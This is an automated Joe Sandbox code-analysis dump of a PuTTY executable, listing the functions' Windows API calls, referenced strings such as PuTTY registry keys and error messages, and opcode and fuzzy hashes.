                                                          • Opcode Fuzzy Hash: 684815918d71c28cd1a7cc4a13ab48144d8ef00458f650a35443704f38f6201f
                                                          • Instruction Fuzzy Hash: 6031E863A0E68261FB71AB21E444B7AF391EF84761F840231C95D426C1CF7FE845E325
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Cursor$InfoLongMessageMonitorSendShowWindowZoomed
                                                          • String ID: (
                                                          • API String ID: 3620415003-3887548279
                                                          • Opcode ID: 4e9abc388ab2ef5b6af433236c4546edd132eaeae81c80817ff72850ed0584e8
                                                          • Instruction ID: ea8c55eafaa7a72fbafca6c323862a02760eeece1820eefa84b5dfee7efa5d98
                                                          • Opcode Fuzzy Hash: 4e9abc388ab2ef5b6af433236c4546edd132eaeae81c80817ff72850ed0584e8
                                                          • Instruction Fuzzy Hash: DA31E463A0E68261FB71AB20E454B7AE3A1EF88751F840131C94D426C1CF7FE885E725
                                                          APIs
                                                            • Part of subcall function 00007FF738A697E0: GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A69995
                                                            • Part of subcall function 00007FF738A697E0: GetEnvironmentVariableA.KERNEL32 ref: 00007FF738A699AB
                                                            • Part of subcall function 00007FF738A697E0: GetWindowsDirectoryA.KERNEL32 ref: 00007FF738A69A15
                                                            • Part of subcall function 00007FF738A5A160: CoCreateInstance.OLE32(?,?,?,?,?,?,00007FF738A69E12), ref: 00007FF738A5A193
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69E45
                                                          • RegDeleteKeyA.ADVAPI32 ref: 00007FF738A69E7C
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69E91
                                                            • Part of subcall function 00007FF738A69F00: RegDeleteKeyA.ADVAPI32 ref: 00007FF738A69F26
                                                            • Part of subcall function 00007FF738A69F00: RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF738A69E42), ref: 00007FF738A69F70
                                                          • RegDeleteKeyA.ADVAPI32 ref: 00007FF738A69EDB
                                                          Strings
                                                          Similarity
                                                          • API ID: Close$Delete$CreateEnvironmentVariable$DirectoryInstanceWindows
                                                          • String ID: Software$Software\SimonTatham$Software\SimonTatham\PuTTY
                                                          • API String ID: 1055326402-1491235443
                                                          • Opcode ID: b90cf6bd07fd6fb521182397b13cf776ab7508255cead5d934bd6327e3e7fbbd
                                                          • Instruction ID: 6d7f934c89f91d28e63340df7ae9283d019fb62939787ed4f4185a6d539f61ee
                                                          • Opcode Fuzzy Hash: b90cf6bd07fd6fb521182397b13cf776ab7508255cead5d934bd6327e3e7fbbd
                                                          • Instruction Fuzzy Hash: 2E218022E0F60260F919B7A5A4117F9D1819F487A0FD41235ED1E067CAEE7FA042B36C
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$Long$Item
                                                          • String ID: '
                                                          • API String ID: 4195074732-1997036262
                                                          • Opcode ID: 74b4d8108d9193db64c8ba223df101fe393fbd358917c9eab547b15f2dfa108f
                                                          • Instruction ID: 892c3c18e31e6ac7d73b7b4e6c01c7ba21ba48660efa4c2f09211702fe6f22f7
                                                          • Opcode Fuzzy Hash: 74b4d8108d9193db64c8ba223df101fe393fbd358917c9eab547b15f2dfa108f
                                                          • Instruction Fuzzy Hash: 14F0D16271559142E6509B3A7C04B5AA641AFCAFF4F688330EE3D47BE4CF3D88439705
                                                          APIs
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID:
                                                          • API String ID: 3015471070-0
                                                          • Opcode ID: f93d6b86cd041d8a3dd9f56b7eafb3e2b912a4165b6983f93cefb03ebf36bb7b
                                                          • Instruction ID: 88ee6e98532865d4978ebf987d2a76687a7c1ca1868cf49cb599125b6771b45b
                                                          • Opcode Fuzzy Hash: f93d6b86cd041d8a3dd9f56b7eafb3e2b912a4165b6983f93cefb03ebf36bb7b
                                                          • Instruction Fuzzy Hash: B92106227255605AE2709B03BD10FB69685BB8AFD8F084125BC8D47F84CF3DC7069B88
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: f$p$p
                                                          • API String ID: 3215553584-1995029353
                                                          • Opcode ID: 9fbd3fd91531b4627247c64885e35ed9c7696d219eed8e081392c136c2912068
                                                          • Instruction ID: 2f2b77c5f9084c4c8e17d2bcb522c2c3e4dfb6e59d1bcbbbff0b79aa50443375
                                                          • Opcode Fuzzy Hash: 9fbd3fd91531b4627247c64885e35ed9c7696d219eed8e081392c136c2912068
                                                          • Instruction Fuzzy Hash: 3112A423A0F243A6FB607E15E854AB9F652FB40754FC44137E6CA466C4DB3EE480B729
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32(?,?,?,?,?,00000000,00000000,?,00007FF738A69B73), ref: 00007FF738A7314B
                                                            • Part of subcall function 00007FF738A73110: RegQueryValueExA.ADVAPI32 ref: 00007FF738A73190
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69C4E
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A69D60
                                                          Strings
                                                          Similarity
                                                          • API ID: Close$QueryValue$Create
                                                          • String ID: Default Settings$Recent sessions$Software\SimonTatham\PuTTY\Jumplist$Software\SimonTatham\PuTTY\Sessions
                                                          • API String ID: 1827015023-773100466
                                                          • Opcode ID: baf68789944d61d44685153b0f362b87e17c9d93972af2ec7029f1a374bcddfd
                                                          • Instruction ID: c7d5fc697326c51ff30859baebc6c7aef0c92a233b969468da8242f1833011b2
                                                          • Opcode Fuzzy Hash: baf68789944d61d44685153b0f362b87e17c9d93972af2ec7029f1a374bcddfd
                                                          • Instruction Fuzzy Hash: F951B923A0E65266FA50BB129401B7AE291AF45BD4FC81031EE4D077DADE3EE401A768
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: MZx
                                                          • API String ID: 3215553584-2575928145
                                                          • Opcode ID: 61b1f489ecd1c91699d374143caa174131a828fdbebced07042f56a6fde43186
                                                          • Instruction ID: 85c6a7beacb3ba3f3c09dd7c8d848837edb9534de21c5ef023ef52333cde18f9
                                                          • Opcode Fuzzy Hash: 61b1f489ecd1c91699d374143caa174131a828fdbebced07042f56a6fde43186
                                                          • Instruction Fuzzy Hash: 4751983390B74695E752AF21D85067DFBE49B05B44FC98032C6CC07746DE3E9446E326
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Text$ClipboardDrawEdgeExtentFormatModePoint32Register
                                                          • String ID: commctrl_DragListMsg
                                                          • API String ID: 961708326-3283919134
                                                          • Opcode ID: d6deb4797f899332795a55db4fb1f7832d94278679131d8cde036f170a1f8b15
                                                          • Instruction ID: 011184f90abec9f2cdab21ffc74dad60a2a86a7342a68cae11c97f1d5fbc49dd
                                                          • Opcode Fuzzy Hash: d6deb4797f899332795a55db4fb1f7832d94278679131d8cde036f170a1f8b15
                                                          • Instruction Fuzzy Hash: 935119A3A0964696EA20EF15E850779F7A0FB88B94F844231DE8D03799DE3DE881D710
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: DeleteMenu$Message
                                                          • String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
                                                          • API String ID: 1035315089-2786405544
                                                          • Opcode ID: 5da7f9251fe89786a952673a7e2e62702b5e7534193b3590783bdb2e9f68eba5
                                                          • Instruction ID: 984de8e06e4b5f38eec2a09d74408811958313fb8961f3b22c4514ef140c1c49
                                                          • Opcode Fuzzy Hash: 5da7f9251fe89786a952673a7e2e62702b5e7534193b3590783bdb2e9f68eba5
                                                          • Instruction Fuzzy Hash: 2F51A72760968252EB50FB26E8517ABF761EB84BD4F844032DF8E47796DF3EE0419314
                                                          APIs
                                                          • CreateFileA.KERNEL32 ref: 00007FF738A642B0
                                                          • GetLastError.KERNEL32 ref: 00007FF738A6433A
                                                            • Part of subcall function 00007FF738A644E0: GetCommState.KERNEL32 ref: 00007FF738A64509
                                                            • Part of subcall function 00007FF738AA6FD0: CreateEventA.KERNEL32 ref: 00007FF738AA7024
                                                            • Part of subcall function 00007FF738AA6FD0: InitializeCriticalSection.KERNEL32 ref: 00007FF738AA7084
                                                            • Part of subcall function 00007FF738AA6FD0: CreateEventA.KERNEL32 ref: 00007FF738AA7094
                                                            • Part of subcall function 00007FF738AA6FD0: CreateThread.KERNEL32 ref: 00007FF738AA70D3
                                                            • Part of subcall function 00007FF738AA6FD0: CloseHandle.KERNEL32 ref: 00007FF738AA70E1
                                                            • Part of subcall function 00007FF738AA6C70: CreateEventA.KERNEL32 ref: 00007FF738AA6CC4
                                                            • Part of subcall function 00007FF738AA6C70: InitializeCriticalSection.KERNEL32 ref: 00007FF738AA6D0D
                                                            • Part of subcall function 00007FF738AA6C70: CreateEventA.KERNEL32 ref: 00007FF738AA6D1D
                                                            • Part of subcall function 00007FF738AA6C70: CreateThread.KERNEL32 ref: 00007FF738AA6D5C
                                                            • Part of subcall function 00007FF738AA6C70: CloseHandle.KERNEL32 ref: 00007FF738AA6D6A
                                                          Strings
                                                          Similarity
                                                          • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState
                                                          • String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
                                                          • API String ID: 2954106191-1737485005
                                                          • Opcode ID: c00d760b2c6a5779c1a5ba483eaa3d84c880ad4dedfa82bc057ec96407d812aa
                                                          • Instruction ID: 63c32c8f4230544576eca173cd973739d043ba9afba42b88f998fab795325a24
                                                          • Opcode Fuzzy Hash: c00d760b2c6a5779c1a5ba483eaa3d84c880ad4dedfa82bc057ec96407d812aa
                                                          • Instruction Fuzzy Hash: C741F723B06B4252EA10BB12E85076AF350FB85BE4F808231DE5D07BD6EF3DE1419354
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: NamedPipe$CloseConnectCreateErrorHandleLast
                                                          • String ID: Error while listening to named pipe: %s
                                                          • API String ID: 3669627233-1472817922
                                                          • Opcode ID: 9f7b0a46128b179491b5f2cb1417faaca1884a16d0adb702640206d5d4f83d27
                                                          • Instruction ID: 5ba2ca67063bb7d23ef0e471d2ef156608260983428aa58d9cb1bdf790baa88b
                                                          • Opcode Fuzzy Hash: 9f7b0a46128b179491b5f2cb1417faaca1884a16d0adb702640206d5d4f83d27
                                                          • Instruction Fuzzy Hash: A241E523609A4296E720AB16F41077AF3A0FF89B94F940231EE8E477A4DF7EE4459314
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Window$CapturePlacement$BeepLongMessageRelease
                                                          • String ID: ,
                                                          • API String ID: 3018360031-3772416878
                                                          • Opcode ID: 8cc3ee3a77b55f15fcb0c94ec58535db9b7b3767488d8d5d534f8ad0db8d840c
                                                          • Instruction ID: 26bb05f08781dc84f8da39cc60ae4f001cb89b476d2f7ce23890f9e0b1e93b1f
                                                          • Opcode Fuzzy Hash: 8cc3ee3a77b55f15fcb0c94ec58535db9b7b3767488d8d5d534f8ad0db8d840c
                                                          • Instruction Fuzzy Hash: AA41F9E3E0E14265F768B7339414BBDE681BF91B80F840231D68D026C5DF7EA6C5E229
                                                          APIs
                                                            • Part of subcall function 00007FF738A73BE0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73C9D
                                                            • Part of subcall function 00007FF738A73BE0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D0B
                                                            • Part of subcall function 00007FF738A73BE0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D15
                                                          • GetCurrentProcess.KERNEL32 ref: 00007FF738A73E88
                                                          • GetLastError.KERNEL32 ref: 00007FF738A73EED
                                                          • LocalFree.KERNEL32 ref: 00007FF738A73F17
                                                          Strings
                                                          Similarity
                                                          • API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
                                                          • String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
                                                          • API String ID: 4156538165-2118130043
                                                          • Opcode ID: c26483cee9904842a2d3f2f73f9f46a8c568db35b1819ee42160507be448fe9d
                                                          • Instruction ID: 2ee7e748dc7a86035fa66a9e55f059d8e2eae55b6f2b924eca53707b8b78d3d0
                                                          • Opcode Fuzzy Hash: c26483cee9904842a2d3f2f73f9f46a8c568db35b1819ee42160507be448fe9d
                                                          • Instruction Fuzzy Hash: 0C419F22A0DA8291FB60AB15F4157AAE3A0FF85784F900131EA8C07B54EF7FD446AB15
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htons$inet_ntoainet_ntop
                                                          • String ID: %s:%d$[%s]:%d
                                                          • API String ID: 1873631531-2542140192
                                                          • Opcode ID: 2b29381e440b41626c3693cc85a4ff4459eab8bc113adac27ad787020a841a80
                                                          • Instruction ID: 343d168394584231577681653f2ed36caa885ca07d5ebef847c0fb4c638197e3
                                                          • Opcode Fuzzy Hash: 2b29381e440b41626c3693cc85a4ff4459eab8bc113adac27ad787020a841a80
                                                          • Instruction Fuzzy Hash: 4C41B17260969296EB30AF15E4107BEF7A0FB44780F808135DACE47A94EF3EE445D768
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Menu$DeleteInsert
                                                          • String ID: %s (inactive)$&Restart Session
                                                          • API String ID: 985044671-219138112
                                                          • Opcode ID: 286b43d1dc6695b4bb2b938c4a1364662aad57256ae4f11836091118e94e36fa
                                                          • Instruction ID: 3e6cf23fa25e2892da7b28f23bfb0bf277b3f5e00d9aed843a16d33b3f184fd8
                                                          • Opcode Fuzzy Hash: 286b43d1dc6695b4bb2b938c4a1364662aad57256ae4f11836091118e94e36fa
                                                          • Instruction Fuzzy Hash: ED218D2B715A4193EB20AB2AE460B6AE361FB85BD4F844031CF8E03B61CF3EE445D314
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait
                                                          • String ID: CreateMutex("%s") failed: %s
                                                          • API String ID: 1132015839-2623464464
                                                          • Opcode ID: a15bbfb5595d817062a9d87dfb6caacd10874586bf9c92be9f6c495149f264c5
                                                          • Instruction ID: 64cb3b4684c9634d071d15e37fd7181843a90c21e7b07a7dced0361b5fbeca60
                                                          • Opcode Fuzzy Hash: a15bbfb5595d817062a9d87dfb6caacd10874586bf9c92be9f6c495149f264c5
                                                          • Instruction Fuzzy Hash: 4121F82360EB8251EA50AB61A45077AF3A0FF89790F840234EE8D477A4DF3ED4459714
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A0D
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A3A
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A4B
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A5C
                                                          • SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: a80bd8287d4a02c82c82fc9d3c13edde732b8b1964cf5f6f4dee72e7713fa1b7
                                                          • Instruction ID: 6b8ac5563bbd1079fdb2cc18957554480f3cc75524644d0e5305b89ce9540ddd
                                                          • Opcode Fuzzy Hash: a80bd8287d4a02c82c82fc9d3c13edde732b8b1964cf5f6f4dee72e7713fa1b7
                                                          • Instruction Fuzzy Hash: 7221BEA3A0C24362FA6CB721565187EE2429F447A0F944734D93E076E2DF3EB845622B
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: Cursor$ClassLoadLongShow
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$false && "Bad busy_status"
                                                          • API String ID: 1160125251-2820030088
                                                          • Opcode ID: 590d1deca98dead610a2abe45b045ea7ce18ae4f2d50d21b19b543372c4da44b
                                                          • Instruction ID: 6e12a5a881273232659a34e780552f074facee5781e0a4d4a9603bcefcf76c5a
                                                          • Opcode Fuzzy Hash: 590d1deca98dead610a2abe45b045ea7ce18ae4f2d50d21b19b543372c4da44b
                                                          • Instruction Fuzzy Hash: B3112592E0E14365F7A06326F884679E740AF45781F944231CD0E42394CE3FA849E325
                                                          APIs
                                                          Similarity
                                                          • API ID: Window$CompatibleCreateDeleteExtentInvalidateObjectPoint32ProcRectSelectText
                                                          • String ID:
                                                          • API String ID: 2525508449-0
                                                          • Opcode ID: 946eaf59e17a8cd839a389946fb007ce393ae0ea006f40bf7270afd086559598
                                                          • Instruction ID: 4de7ede7950e0de7490911a1d521a4f9aee5e6e9ec0d8cb76c71882ae2d24361
                                                          • Opcode Fuzzy Hash: 946eaf59e17a8cd839a389946fb007ce393ae0ea006f40bf7270afd086559598
                                                          • Instruction Fuzzy Hash: 6F11E3A3B0920243EB54EB26B81463AE351FB8AB94F840135DE0F07B14DE3EE0469A18
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: e72ab24883a4aeed251333585f7eba344b1e3b938fb2565dcc17371d7b918771
                                                          • Instruction ID: 77eb45ea0ceb2c3070839cf1e291efacbba8447982ebd6b59a9751844b6347f9
                                                          • Opcode Fuzzy Hash: e72ab24883a4aeed251333585f7eba344b1e3b938fb2565dcc17371d7b918771
                                                          • Instruction Fuzzy Hash: BB11D663718A4282E750AB02F854326F7A1FB49FE0F844334DA1D87790DF7DD9448719
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: ObjectPaletteReleaseSelectStock
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$wgs->term_hwnd$wgs->wintw_hdc
                                                          • API String ID: 3714893027-1489009455
                                                          • Opcode ID: 2792394f4c5e16a1c4420a983641462e13661c39d9876bbeae5a0cce8b336482
                                                          • Instruction ID: 9e51b8cb7ae1217aecae94dd9252d63cf4de5154e884b71db8fa477df77ae0de
                                                          • Opcode Fuzzy Hash: 2792394f4c5e16a1c4420a983641462e13661c39d9876bbeae5a0cce8b336482
                                                          • Instruction Fuzzy Hash: B201C062A09613E2EA206715F5057B4E321EF45BC0F945035CA0E036918F7FF445A329
                                                          APIs
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 3215553584-0
                                                          • Opcode ID: 06a6e71633e3dfa68ccbf558cc1962882461144757633eb0d3fffcf3c59d29a3
                                                          • Instruction ID: 860eadc8347ca044489a2c72bd0a91386bde136dcdd6b129d1c0995dd28877ea
                                                          • Opcode Fuzzy Hash: 06a6e71633e3dfa68ccbf558cc1962882461144757633eb0d3fffcf3c59d29a3
                                                          • Instruction Fuzzy Hash: 75F1D733A0B6565AE751AB25C850ABDFBE0AB11F84FE48033C69C47381DF3EB455A718
                                                          APIs
                                                          Similarity
                                                          • API ID: Char$ObjectSelectWidthWidth32
                                                          • String ID:
                                                          • API String ID: 4136774150-0
                                                          • Opcode ID: f0198642de19c96cdc66f8beea68bc1deb05833f5721ec38c6a4087a9e179af5
                                                          • Instruction ID: abeb4ed96e91bc252a990e7135d706572610f9a4211a4006881a64f1e9d24be9
                                                          • Opcode Fuzzy Hash: f0198642de19c96cdc66f8beea68bc1deb05833f5721ec38c6a4087a9e179af5
                                                          • Instruction Fuzzy Hash: 4F41E533A1940256EB649B24E484A79E361FB84B44FD41132EA5EC77D4CE7FE802E714
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01B4F
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01B85
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BB2
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BC3
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BD4
                                                          • SetLastError.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BEF
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: ae4cd5ffa51278c9c9ff1584ec2722894828c174a33d3779a9d712916efffa38
                                                          • Instruction ID: 50c000bcd4d5c6cfb5ee6e5671604add462d349b0c3b8a65aeb60d0dba456078
                                                          • Opcode Fuzzy Hash: ae4cd5ffa51278c9c9ff1584ec2722894828c174a33d3779a9d712916efffa38
                                                          • Instruction Fuzzy Hash: F411D1A3A0C60361FA28B371565183DE1869F447B0F900730D83E477D6EF7EA842A22B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID: MZx
                                                          • API String ID: 2718003287-2575928145
                                                          • Opcode ID: e1fbbe907faa3b4890b7ae7faba687bd7e731967cfaa35ae938c5d24a66423bf
                                                          • Instruction ID: d339dacf41886da50ef440bb29b16f316815bffde052bdfbaf8875320f1117d1
                                                          • Opcode Fuzzy Hash: e1fbbe907faa3b4890b7ae7faba687bd7e731967cfaa35ae938c5d24a66423bf
                                                          • Instruction Fuzzy Hash: BED13363B08A8299E710DF79D4106ACF7B1FB04B98B904232CE6D57B99DF3AD406D316
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,?,?,0000000100000083,00000000,?,00000000,00000000,00007FF738A74222), ref: 00007FF738A75825
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: UTF-8
                                                          • API String ID: 1807457897-243350608
                                                          • Opcode ID: 4d0900a3972e6aa67fdcfce35f530c52b4d99f4ebdefa0280f964932d7d58080
                                                          • Instruction ID: ee84c8c2b4bdab8ef087d94a854f08c94121e16496c2ff0ed0fdb349d98da034
                                                          • Opcode Fuzzy Hash: 4d0900a3972e6aa67fdcfce35f530c52b4d99f4ebdefa0280f964932d7d58080
                                                          • Instruction Fuzzy Hash: 85710623F0E68366FA6477645850A3EE6E16F41364FD80532ED9D072E1DD3FE841B228
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          • TranslateName.LIBCMT ref: 00007FF738B07699
                                                          • TranslateName.LIBCMT ref: 00007FF738B076D4
                                                          • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF738AF7140), ref: 00007FF738B07719
                                                          • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF738AF7140), ref: 00007FF738B07741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                          • String ID: utf8
                                                          • API String ID: 1791977518-905460609
                                                          • Opcode ID: 7fa227e98a0a6ec30ce97f664649ba0abab5266cf78db809c634d52a8dc15e80
                                                          • Instruction ID: 423f37452dfa9d5af1a1a3abaaeae9f8f4517cdb6da0c9bc56af300e1a20f272
                                                          • Opcode Fuzzy Hash: 7fa227e98a0a6ec30ce97f664649ba0abab5266cf78db809c634d52a8dc15e80
                                                          • Instruction Fuzzy Hash: A65196A3A08343A2E664BB12D400AB9E654AF44B80F844135CE6D47792DF3FE555E36F
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _get_daylight$InformationTimeZone_invalid_parameter_noinfo
                                                          • String ID: @
                                                          • API String ID: 3482513350-2766056989
                                                          • Opcode ID: cd24742ad62feda542a55c21e70db84c2a5d5635fd28f5533d9d1e1c3d716e18
                                                          • Instruction ID: 2f486dd970f0cb5738cf85325dcbff53ba4c3ccb5a05e5f0bb33b021a1e4e46a
                                                          • Opcode Fuzzy Hash: cd24742ad62feda542a55c21e70db84c2a5d5635fd28f5533d9d1e1c3d716e18
                                                          • Instruction Fuzzy Hash: 4251D473A0864396E710FF22E8805AAF762FB88784F844135EA4D47B96DF3DE4019769
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend$LocalTimewcsftime
                                                          • String ID: %Y-%m-%d %H:%M:%S
                                                          • API String ID: 2023452587-819171244
                                                          • Opcode ID: 372bc13db1d882b2b296d98ef2a3135d5becb213e57101d97af90f41ed2a4930
